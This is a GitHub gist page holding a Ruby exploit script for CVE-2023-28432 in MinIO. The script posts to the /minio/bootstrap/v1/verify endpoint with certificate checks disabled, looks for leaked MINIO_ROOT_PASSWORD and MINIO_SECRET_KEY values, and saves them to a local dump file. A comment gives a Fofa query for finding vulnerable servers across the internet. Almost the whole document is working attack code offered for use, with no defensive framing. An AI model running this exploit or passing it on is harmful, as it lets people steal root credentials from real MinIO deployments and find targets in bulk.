Skip to content

Instantly share code, notes, and snippets.

@komodoooo
Last active June 24, 2023 18:53
Show Gist options
  • Save komodoooo/645a7ad31a5a615926d50ffb764992f2 to your computer and use it in GitHub Desktop.
Save komodoooo/645a7ad31a5a615926d50ffb764992f2 to your computer and use it in GitHub Desktop.
CVE-2023-28432 exploit
require 'http'
require 'openssl'
puts """
CVE-2023-28432
MinIO information disclosure exploit
By komodo\n
"""
=begin
Fofa query to search vulnerable targets:
body="Temporary Redirect" && header="307 Temporary Redirect" && header="Location: http://" && server="elb"
=end
$cont=1
$dirname="Minio_dump"
def dir(name=$dirname)
begin
Dir.mkdir(name)
Dir.chdir(name)
rescue Errno::EEXIST
$cont+=1
dir("#{$dirname}-#{$cont}")
end
end
def main(url)
url.delete_suffix!("/") unless url[-1..-1] != "/"
@ctx = OpenSSL::SSL::SSLContext.new()
@ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE
headerz={ #https://user-agents.net/random
"User-Agent"=>"Mozilla/5.0 (Linux; Android 7.1.1; K88) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Safari/537.36",
"Content-Type"=>"application/x-www-form-urlencoded"
}
r=HTTP.post("#{url}/minio/bootstrap/v1/verify", :ssl_context=>@ctx, :headers=>headerz)
if r.code==0xc8&&r.body.to_s.match?(/MINIO_ROOT_PASSWORD|MINIO_SECRET_KEY/)
dir()
File.open("!target.txt", "w"){|f|f.write(url)}
File.new("dump.json","w").write(r.body)
puts "\n#{r.body.to_s.gsub(",",",\n")}\nSaved on '#{Dir.pwd.split("/")[-1]}/dump.json' file.\n"
else
puts "Not vulnerable! :(\n"
end
end
begin
print"Base URL: "
main(gets.chomp)
rescue => e
abort(e.to_s)
end
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment